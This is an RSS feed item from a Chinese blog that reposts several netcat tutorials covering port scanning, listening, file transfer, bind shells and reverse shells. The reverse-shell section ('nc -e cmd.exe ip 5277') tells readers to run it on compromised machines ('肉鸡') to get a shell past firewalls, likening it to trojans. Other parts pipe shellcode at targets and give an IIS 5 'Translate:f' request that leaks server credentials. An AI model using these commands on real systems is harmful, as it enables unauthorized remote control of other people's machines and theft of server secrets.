<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></title> 
<link>http://www.jackxiang.com/index.php</link> 
<description><![CDATA[赢在IT，Playin' with IT,Focus on Killer Application,Marketing Meets Technology.]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[向东博客 专注WEB应用 构架之美 --- 构架之美，在于尽态极妍 | 应用之美，在于药到病除]]></copyright>
<item>
<link>http://www.jackxiang.com/post//</link>
<title><![CDATA[nc(瑞士军刀)的详细使用以及下载参考资料]]></title> 
<author>jack &lt;xdy108@126.com&gt;</author>
<category><![CDATA[WEB2.0]]></category>
<pubDate>Fri, 10 Sep 2010 14:10:47 +0000</pubDate> 
<guid>http://www.jackxiang.com/post//</guid> 
<description>
<![CDATA[ 
	<div class="code">nc -L -p 80</div><br/><br/>格式：nc -L -p 80<br/>讲解：使用&#039;-L&#039;(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止<br/><br/><br/><br/><br/>nc(瑞士军刀)的详细使用以及下载参考资料：程序原创者Hobbit与Chris Wysopal的说明文档、G-python、黑猫警长、Quack、zhoutree等各位高手的文章 <br/><br/><br/>netcat被誉为网络安全界的&#039;瑞士军刀&#039;，相信没有什么人不认识它吧...... <br/>一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具， <br/>能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几 <br/>乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。 <br/><br/>在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由&#039;红与黑&#039;编译 <br/>后的新&#039;浓缩&#039;版。&#039;浓缩&#039;版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法， <br/>有此功能的原版NC好象要60KB：P），虽然&quot;体积&quot;小，但很完成很多工作。 <br/>&lt;!--StartFragment--&gt;=====================================================================================================<br/>软件介绍：<br/><br/>工具名：Netcat<br/>作者：Hobbit &amp;&amp; Chris Wysopal<br/>网址：http://www.atstake.com/research/tools/network_utilities/<br/>类别：开放源码<br/>平台：Linux/BSD/Unix/Windows <br/>WINDOWS下版本号：[v1.10 NT]<br/><br/>=====================================================================================================<br/>参数介绍：<br/><br/>&#039;nc.exe -h&#039;即可看到各参数的使用方法。<br/>基本格式：nc [-options] hostname port[s] [ports] ...<br/>nc -l -p port [options] [hostname] [port]<br/><br/>-d 后台模式<br/>-e prog 程序重定向，一旦连接，就执行 [危险!!]<br/>-g gateway source-routing hop point[s], up to 8<br/>-G num source-routing pointer: 4, 8, 12, ...<br/>-h 帮助信息<br/>-i secs 延时的间隔<br/>-l 监听模式，用于入站连接<br/>-L 连接关闭后,仍然继续监听<br/>-n 指定数字的IP地址，不能用hostname<br/>-o file 记录16进制的传输<br/>-p port 本地端口号<br/>-r 随机本地及远程端口<br/>-s addr 本地源地址<br/>-t 使用TELNET交互方式<br/>-u UDP模式<br/>-v 详细输出--用两个-v可得到更详细的内容<br/>-w secs timeout的时间<br/>-z 将输入输出关掉--用于扫描时<br/><br/>端口的表示方法可写为M-N的范围格式。<br/><br/><br/>=====================================================================================================<br/>基本用法：<br/><br/>大概有以下几种用法：<br/><br/>1)连接到REMOTE主机，例子：<br/>格式：nc -nvv 192.168.x.x 80<br/>讲解：连到192.168.x.x的TCP80端口<br/><br/><br/>2)监听LOCAL主机，例子：<br/>格式：nc -l -p 80<br/>讲解：监听本机的TCP80端口<br/><br/><br/>3)扫描远程主机，例子：<br/>格式：nc -nvv -w2 -z 192.168.x.x 80-445<br/>讲解：扫描192.168.x.x的TCP80到TCP445的所有端口<br/><br/><br/>4)REMOTE主机绑定SHELL，例子：<br/>格式：nc -l -p 5354 -t -e c:&#92;winnt&#92;system32&#92;cmd.exe<br/>讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口<br/><br/><br/>5)REMOTE主机绑定SHELL并反向连接，例子：<br/>格式：nc -t -e c:&#92;winnt&#92;system32&#92;cmd.exe 192.168.x.x 5354<br/>讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口<br/><br/><br/>以上为最基本的几种用法（其实NC的用法还有很多，<br/>当配合管道命令&quot;&#124;&quot;与重定向命令&quot;&lt;&quot;、&quot;&gt;&quot;等等命令功能更强大......）。<br/><br/>=====================================================================================================<br/>高级用法：<br/><br/>6)作攻击程序用，例子：<br/>格式1：type.exe c:&#92;exploit.txt&#124;nc -nvv 192.168.x.x 80<br/>格式2：nc -nvv 192.168.x.x 80 &lt; c:&#92;exploit.txt<br/>讲解：连接到192.168.x.x的80端口，并在其管道中发送&#039;c:&#92;exploit.txt&#039;的内容(两种格式确有相同的效果，<br/>真是有异曲同工之妙)<br/><br/>附：&#039;c:&#92;exploit.txt&#039;为shellcode等<br/><br/><br/>7)作蜜罐用[1]，例子：<br/>格式：nc -L -p 80<br/>讲解：使用&#039;-L&#039;(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止<br/><br/><br/>8)作蜜罐用[2]，例子：<br/>格式：nc -L -p 80 &gt; c:&#92;log.txt<br/>讲解：使用&#039;-L&#039;可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到&#039;c:&#92;log.txt&#039;中，如果把&#039;&gt;&#039;<br/>改为&#039;&gt;&gt;&#039;即可以追加日志<br/><br/>附：&#039;c:&#92;log.txt&#039;为日志等<br/><br/><br/>9)作蜜罐用[3]，例子：<br/>格式1：nc -L -p 80 &lt; c:&#92;honeypot.txt<br/>格式2：type.exe c:&#92;honeypot.txt&#124;nc -L -p 80<br/>讲解：使用&#039;-L&#039;可以不停地监听某一个端口，直到ctrl+c为止，并把&#039;c:&#92;honeypot.txt&#039;的内容&#039;送&#039;入其管道中<br/>netcat教程（教你怎么用瑞士军刀）<br/>-- 作者： 康飞鸽<br/>-- 发布时间： 2003/08/04 01:34pm <br/><br/> <br/><br/>作者：不详&nbsp;&nbsp;来源：不详&nbsp;&nbsp;2003-7-29 <br/><br/> <br/><br/>在网络工具中有“瑞士军刀”美誉的NetCat， 在我们用了N年了至今仍是爱不释手。因为它短小精悍（这个用在它身上很适合，现在有人已经将其修改成大约10K左右，而且功能不减少）。现在就我的一些使用心得和一些帮助文档中，做一些介绍与大家共勉。 <br/>1、 了解NC的用法 <br/>命令：nc –h <br/>技巧：win98用户可以在autoexec.bat加入path=nc的路径，win2000用户在环境变量中加入path中，linux含有这个命令（redhat） <br/>1、基本使用 <br/>想要连接到某处: nc [-options] hostname port[s] [ports] ... <br/>绑定端口等待连接: nc -l -p port [-options] [hostname] [port] <br/>参数: <br/>-e prog 程序重定向，一旦连接，就执行 [危险!!] <br/>-g gateway source-routing hop point[s], up to 8 <br/>-G num source-routing pointer: 4, 8, 12, ... <br/>-h 帮助信息 <br/>-i secs 延时的间隔 <br/>-l 监听模式，用于入站连接 <br/>-n 指定数字的IP地址，不能用hostname <br/>-o file 记录16进制的传输 <br/>-p port 本地端口号 <br/>-r 任意指定本地及远程端口 <br/>-s addr 本地源地址 <br/>-u UDP模式 <br/>-v 详细输出——用两个-v可得到更详细的内容 <br/>-w secs timeout的时间 <br/>-z 将输入输出关掉——用于扫描时 <br/>其中端口号可以指定一个或者用lo-hi式的指定范围。 <br/>例如：扫描端口 <br/>tcp扫描 <br/>C:&#92;nc&gt;nc -v -z -w2 192.168.0.80 1-140 <br/>net [192.168.0.80] 140 (?) <br/>net [192.168.0.80] 139 (netbios-ssn) open <br/>net [192.168.0.80] 138 (?) <br/>net [192.168.0.80] 137 (netbios-ns) <br/>net [192.168.0.80] 136 (?) <br/>net [192.168.0.80] 135 (epmap) open <br/>net [192.168.0.80] 81 (?) open <br/>net [192.168.0.80] 80 (http) open <br/>net [192.168.0.80] 79 (finger) <br/>net [192.168.0.80] 25 (smtp) open <br/>net [192.168.0.80] 24 (?) <br/>net [192.168.0.80] 23 (telnet) <br/>net [192.168.0.80] 21 (ftp) <br/>udp扫描 <br/>C:&#92;nc&gt;nc -u -v -z -w2 192.168.0.80 1-140 <br/>net [192.168.0.80] 140 (?) open <br/>net [192.168.0.80] 139 (?) open <br/>net [192.168.0.80] 138 (netbios-dgm) open <br/>net [192.168.0.80] 137 (netbios-ns) open <br/>net [192.168.0.80] 54 (?) open <br/>net [192.168.0.80] 53 (domain) open <br/>net [192.168.0.80] 38 (?) open <br/>net [192.168.0.80] 37 (time) open <br/>net [192.168.0.80] 7 (echo) open <br/>二、高级应用 <br/>1．Window用法： <br/>（1）IE的MIME欺骗 <br/>www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点) <br/>打开这个页面，http://www.try2hack.nl/cgi-bin/level7.pl页面（这个网站提供了黑客的8关，过了这8关证明你开始入门了），这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft.com/ms.htm重定向链接过去的，有病阿（这是一个题目呀，要慢慢研究），linux有IE6.72? 微软会在它的页面上http://www.try2hack.nl/cgi-bin/level7.pl的链接？看看页面的源代码，level7.pl是在服务器端 执行的perl脚本，根本无法看到，还是研究一下IE5和它通信时都告诉了它什么，抓包，我们会发现，我们的IE5告诉对方： 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈，level7.pl这个cgi应该是根据这些信息知道我们不是它要求的 客户，嘿嘿，需要欺骗对方才行，用军刀来可以实现，如下做就可以哄对方了： <br/>nc www.try2hack.nl 80 [enter] <br/>GET /cgi-bin/level7.pl HTTP/1.1 [enter] <br/>Accept: image/gif, image/x-xbitmap, application/msword, */* [enter] <br/>Referehttp://www.microsoft.com/ms.htm [enter] <br/>Accept-Language: zh-cn [enter] <br/>Accept-Encoding: gzip, deflate [enter] <br/>User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) [enter] <br/>Host: www.try2hack.nl [enter] <br/>Connection: <br/>Keep-Alive [enter] <br/>注意，如果出现HTTP 400时，说明你输入格式有问题，出现httpd 200回应时，就给出结果了： <br/>哈哈！赶快去实现一下（实践是成功之母） <br/>（2）IIS 5 “Translate:f” 显示代码脆弱点 <br/>Translate:f脆弱点的机制：发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型（例如.ASP或者global.asa）。这些文件是用于服务器上运行的，绝不会到客户机上去，而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上，而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f，并有一个反斜杠”&#92;”附于URL之后。下面就有这样的一个例子（[CRLF]代表回车字符） <br/>注意 GET global.asa 后的反斜杠以及Translate:f头信息。 <br/>GET /global.asa&#92; HTTP/1.0 <br/>Host:192.168.0.1 <br/>User-Agent:SensePostData <br/>Content-Type:application/x-www-form-urlencoded <br/>Translate:f <br/>[CRLF] <br/>[CRLF] <br/>将以上内容保存在一个文本文件中（例如example.txt） <br/>然后向一个有这个漏洞的服务器发送 <br/>c:&#92;&gt;type example.txt &#124; nc –nvv 192.168.0.80 80 <br/>(UNKNOWN) [192.168.0.80] 80 (?) open <br/>HTTP/1.1 200 OK <br/>Server: Microsoft-IIS/5.0 <br/>Date: Tue, 03 Dec 2002 08:50:46 GMT <br/>Content-Type: application/octet-stream <br/>Content-Length: 2790 <br/>ETag: “0448299fcd6df1:bea” <br/>Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT <br/>Accept-Ranges: bytes <br/>Cache-Control: no-cache <br/>&lt;!-Copyright 2001-2003 netloafer.com --&gt; <br/>&lt;object RUNAT=Server SCOPE=Session ID=myfix PROCID=”my1.object”&gt;&lt;/object&gt; <br/>(“ConnectionText”) = “Dsn=ph;UID=myman;Password=mygod)” <br/>(“LDAPServer”) = “LADP://ldap.netloafer.com:389” <br/>(“LDAPUserID”) = “CN=Admin” <br/>(“LDAPPwd”) = “mygod” <br/>……… <br/><br/><br/>-- 作者： 康飞鸽<br/>-- 发布时间： 2003/08/04 08:35pm <br/><br/><br/>标题：锋利的瑞士军刀 nc (netcat) <br/>我要评论 <br/>发信人: Sinbad &lt;anonymous@anonymous.com&gt;<br/>标&nbsp;&nbsp;题: 锋利的瑞士军刀 nc (netcat)<br/>发信站: 辛巴达 (Wed Sep 11 18:00:52 2002) <br/><br/><br/>功能强大的网络工具，只要你发挥想象力，你可以做任何事情！ <br/><br/><br/>P2P之间经常用OICQ、MSN传文件，是挺方便，但哪象是高手的做法？ <br/><br/><br/>发送方：<br/>nc -nvv -l -w 5 -p 65535 -s 211.211.211.211 &lt; file.zip <br/><br/><br/>接受方：<br/>nc -nvv 211.211.211.211 65535 &gt; file.zip <br/><br/><br/>接受方没有装nc？那就用IE罗：<br/>http://211.211.211.211:65535/t.zip <br/><br/> <br/><br/>更多的技巧，尽情回复吧：） <br/><br/> <br/><br/>下载地址： <br/><br/><br/>Netcat 1.10 for Unix<br/>http://www.atstake.com/research/tools/nc110.tgz <br/><br/><br/>Netcat 1.1 for Win 95/98/NT/2000<br/>http://www.atstake.com/research/tools/nc11nt.zip<br/>nc（黑客界的瑞士军刀）的用法- -&#123;2006-5-28 13:57:00&#125;<br/> <br/>命令1：监听命令<br/><br/>nc -l -p port<br/>nc -l -p port &gt; e:&#92;log.dat<br/>nc -l -v -p port <br/><br/>参数解释：<br/><br/>-l：监听端口，监听入站信息<br/>-p：后跟本地端口号<br/>-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息 <br/><br/>提示：一般大家都爱用-vv<br/><br/>nc -l -p 80<br/><br/>这个很简单，监听80端口<br/>如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！ <br/><br/>nc -l -p 80 &gt; e:&#92;log.dat<br/><br/>呵呵，功能和上边一样，但是后边加了个“&gt; e:&#92;log.dat”我想，学过ECHO<br/>那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件 <br/><br/>nc -l -v -p 80<br/><br/>和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC<br/>的屏幕上。 <br/><br/><br/>呵呵，讲了这么多，来实践下 <br/><br/>nc -l -v -p 80<br/><br/>然后在浏览器中输入本机IP：127.0.0.1<br/>呵呵，看到什么？ <br/><br/><br/>同样，上边两个也是一样，大家自己试验一下吧 <br/><br/> <br/><br/>命令2：程序定向<br/><br/>nc -l -p port -t -e cmd.exe<br/><br/>本地机： nc -l -p port 或 nc -l -v -p port<br/><br/>目标机：nc -e cmd.exe ip port<br/><br/>参数解释：<br/><br/>-l、-p两个参数已经解释过了<br/><br/>-e；作用就是程序定向<br/>-t：以telnet的形式来应答 <br/><br/>例子<br/><br/>nc -l -p 5277 -t -e cmd.exe<br/><br/>知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器<br/>就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的<br/>入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。 <br/><br/>说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。。（话外音：说这么多遍当我们白痴啊，快往下讲！！！）<br/><br/>呵呵，咱们来找台肉鸡试试，我TELNET IP 5277<br/>HOHO~~如何？ <br/><br/> <br/><br/>local machine：nc -l -p port ( or nc -l -v -p port )<br/>remote machine：nc -e cmd.exe ip port <br/><br/>大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马，<br/>什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说<br/>不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你<br/>这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。 <br/><br/><br/>这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。为什么？<br/>咳！！听我给你讲啊！！（先交100000000RMB学费)哇，别杀我啊！！) <br/><br/>nc -l -p 5277 （坚听本地5277端口）<br/><br/>同样也可以用<br/><br/>nc -l -v -p 5277<br/><br/>运行在本地<br/><br/>然后在远程机器上，想办法运行<br/><br/>nc -e cmd.exe ip 5277<br/><br/>（你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！<br/><br/>呵呵，看看在本地机器上出现了什么？<br/><br/>这样就是反弹~~在本地机器上得到了一个SHELL<br/><br/> <br/><br/>命令3：扫描端口<br/><br/>nc -v ip port<br/>nc -v -z ip port-port<br/>nc -v -z -u ip port-port <br/><br/><br/>参数解释： <br/><br/>-z：将输入输出关掉，在扫描时使用<br/><br/>nc -v ip port<br/><br/>这个命令是针对某一个端口进行扫描<br/><br/>例如：<br/><br/>nc -v ip 135<br/><br/>扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息<br/><br/>例如：80端口<br/><br/>我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息<br/><br/><br/>nc -v -z ip port-port <br/><br/>这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围<br/><br/>例如：<br/><br/>nc -v -z ip 1-200<br/><br/>可以看到我机器上的1-200的TCP端口的开放情况<br/><br/><br/>nc -v -z -u ip port-port <br/><br/>这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的<br/><br/>例如：<br/><br/>nc -v -z -u ip 1-200<br/><br/>这个命令就会扫1-200的UDP端口<br/><br/> <br/><br/>命令4：传送文件（HOHO，I LIKE）<br/><br/>LOCAL MACHINE：nc -v -n ip port &lt; x:&#92;svr.exe<br/>REMOTE MACHINE：nc -v -l -p port &gt; y:&#92;svr.exe <br/><br/>参数解释：<br/><br/>-n：指定数字的IP地址<br/><br/>这两个命令结合起来是用来传送文件的<br/><br/>首先，在远程机上运行命令：<br/><br/>nc -v -l -p 5277 &gt; c:&#92;pulist.exe<br/><br/>这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口<br/><br/>并把接受到的信息数据写到c:&#92;pulist.exe中<br/><br/><br/>这时候在本地机上运行 <br/><br/>nc -v -n ip 5277 &lt; e:&#92;hack&#92;pulist.exe<br/><br/>这个命令的意思就是，从本地E盘跟目录中读取pulist.exe文件的内容，并把这些数据发送到ip的5277端口上<br/><br/>这样远程主机就会自动创建一个pulist.exe文件。。呵呵，你想到了吗？？<br/><br/><br/>上边是NC的比较常用的方法，希望通过这些，大家能发挥自己的想象力，创造出更多更精彩的命令来，<br/>因为NC的用法不仅仅局限于这几种而已哦！！对NC来说，只有想不到，没有做不到的！！！ <br/> <br/>参考：http://enjoynowlive.spaces.live.com/blog/cns!AA4D179B396E791!141.entry<br/><br/>http://hi.baidu.com/xiuke/blog/item/dfd5f91f9ded2763f724e41c.html<br/>
]]>
</description>
</item><item>
<link>http://www.jackxiang.com/post//#blogcomment</link>
<title><![CDATA[[评论] nc(瑞士军刀)的详细使用以及下载参考资料]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://www.jackxiang.com/post//#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>